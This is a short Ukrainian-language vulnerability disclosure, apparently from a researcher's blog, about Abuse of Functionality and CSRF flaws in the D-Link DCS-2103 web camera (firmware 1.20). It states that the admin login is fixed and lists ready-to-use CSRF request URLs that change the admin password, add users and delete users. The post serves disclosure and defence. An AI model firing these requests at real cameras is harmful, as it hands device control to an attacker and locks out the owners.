AoF та CSRF уразливості в D-Link DCS-2103
20:05 24.10.201524.07.2015
У серпні, 01.08.2014, я виявив Abuse of Functionality та Cross-Site Request Forgery уразливості в D-Link DCS-2103 (веб камера). Це четверта частина дірок в DCS-2103.
Раніше я писав про CSRF та XSS уразливості в D-Link DCS-2103.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.
24.10.2015
Abuse of Functionality (WASC-42):
Фіксований логін адміна: admin. Що спрощує BF і CSRF атаки.
Cross-Site Request Forgery (WASC-09):
Зміна паролю адміна:
http://site/vb.htm?adduser=admin:password:0
Додавання користувача:
http://site/vb.htm?adduser=user:pass:2
Видалення користувача:
http://site/vb.htm?deluser=user
Уразлива версія D-Link DCS-2103, Firmware 1.20. Дана модель з іншими прошивками також повинна бути вразливою.